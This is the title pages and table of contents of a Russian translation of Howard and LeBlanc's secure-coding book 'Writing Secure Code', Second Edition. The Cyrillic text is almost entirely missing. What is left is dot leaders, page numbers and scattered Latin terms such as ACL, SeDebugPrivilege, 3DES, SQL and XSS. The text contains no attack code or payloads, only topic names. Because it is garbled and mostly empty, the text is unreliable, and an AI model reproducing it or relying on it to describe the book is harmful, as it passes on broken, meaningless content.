Академический Документы
Профессиональный Документы
Культура Документы
, .
, ,
, .
Michael Howard
David LeBlank
WRITING
SECURE
CODE
Second Edition
2- ,
2005
004.45
32.973.26018.2
X68
., .
X68
/. . 2 ., . .:
, 2005. 704 .: .
ISBN 9785750202386
. ,
,
, ,
.
C# Perl.
, Win
dows Security Push Microsoft.
, ,
, ,
, , ,
.
24 , 5 ,
.
004.45
32.973.26018.2
Microsoft Corporation, ,
, .
Active Directory, ActiveX, Authenticode, Hotmail, JScript, Microsoft, Microsoft Press, MSDN, MSDOS,
Visual Basic, Visual C++, Visual Studio, Win32, Windows, Windows NT
Microsoft / .
.
, , , Web, ,
, , , ,
, , , Web, ,
, .
,
Microsoft Corporation, 2003
, Microsoft Corporation,
20032004
,
, 2005
XX
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXI
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXIII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXIII
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
2: ,
. . . . . . . . . . . . . . . . . . . . . . . . 17
3: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
4: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . 18
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
VI
19
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . .
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
34
35
36
36
36
36
37
37
38
38
39
39
39
40
40
40
41
41
41
3 ,
43
SD : , . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
21
22
24
25
25
26
26
27
27
28
31
34
34
43
44
45
45
46
46
VII
, . . . . . . . . . . . . . . . . .
. . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
, ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
57
57
58
58
59
60
48
49
50
51
53
55
55
55
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
. . . . . . . . . . . . . . . . . . 79
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
, . . . . . . . . . . . . . . . . . . 99
, , MAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
, . . . . 100
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
, . . . . . . . . . . . . . . . . . . . 101
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
I I
1:
107
108
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
VIII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Unicode ANSI . . . . . . . . . . . . . . . . . . 130
, Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
. . . . . . . . . . 142
/GS Visual C++ .NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
147
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
: . . . . . . . . . . . . . . . . . . . . . . . . 149
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL Windows NT 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 159
ACL Active Template Library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
SID
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
DACL ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
DACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
, DACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
.NET Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
COM+ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
SQL Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
. . . . . . . . . . . . . . 175
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
177
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
SeBackupPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
SeRestorePrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
IX
SeDebugPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
SeTcbPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
SeAssignPrimaryTokenPrivilege SeIncreaseQuotaPrivilege . . . . . . . . . 185
SeLoadDriverPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
SeRemoteShutdownPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
SeTakeOwnershipPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
, , SID, ACL . . . . . . . . . . . . . . . . . . . . . 187
SID ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
. . . . . . . . . . . . . . 188
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
LSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
, . . . . . . . 190
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
LSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
1: , . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
2: , API
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
3: , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
4: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
5: SID . . . . 199
6: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Windows XP/.NET
Server 2003 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Windows .NET Server 2003 . . . . . . . . . . . . . . . . . . . . . . . . 214
, . . . . . . . . . . . . . . . 215
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
222
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
rand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
Win32 . . . . . . . . . . . . . . . . . . . . . . . 225
. . . . . . . . . 230
Web . . . . . . . . . . 230
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
, . . . . . . . . . . . . . . . . . . 247
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 248
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
: , . . . . . . . . . . . . . . . . . . . . . . . 249
. . . . . . . . 254
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
257
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
PKCS #5 . . . . . . . . . . . . . . . . . . . . . . . 261
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . 262
: Windows XP . . . . . . . . . . . . . . . . . . . . . . . . 265
Windows NT 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Windows 95/98/Me Windows CE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
PnP . . . . . . . . . . . . . . . . . . . . . . . . 271
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
FAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
XOR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
3DES ,
,
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
XI
3DES,
, ,
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292
10
293
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
, . . . . . . . . . . . . . . . . . 296
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
Perl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 300
. . . . . . . . . . . . . . . . . . . . . 301
( ) . . . . . . . . . . . . . . . . . . . . . . . 303
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307
Perl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
, . . . . . . . . . . . . . . . . . . . . . . 310
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
11
312
. . . . . . . . . . . . . . . . . . . 313
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Napster . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Mac OS X Apache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
DOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
/tmp StarOffice
Sun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
Windows . . . . . . . . . . . . . . . . . . . . . . . . 315
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
AOL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
eEye . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Internet Explorer 4. IP . . . . . . . . . . . . . . . . . . . . . . . . . 322
, ::$DATA Internet Information Server 4.0 . . . . . . . . . . . 323
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
. . . . . . . . . . . . . 328
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
. . . . . . . . . . . . . . . . . . . . . . . . . . 329
. . . . . . . . . . . . . . 330
8.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
XII
PATH
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
. . . . . . . . . . . . . . . . . . . . . . . . . . 332
CreateFile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
Web . . . . . . . . . . . . . . . . . . . . . . . . . . 336
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
UTF8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
ISAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337
: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
12
342
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
1: . . . . . . . . . . . . . . . . . . . . . . . . . 345
2: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
1:
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
2: SQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
13 Web-
355
: . . . . . 355
<SCRIPT> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
, XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
